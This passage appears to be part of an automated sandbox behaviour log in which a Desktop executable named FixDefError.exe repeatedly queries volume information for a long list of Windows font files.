      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
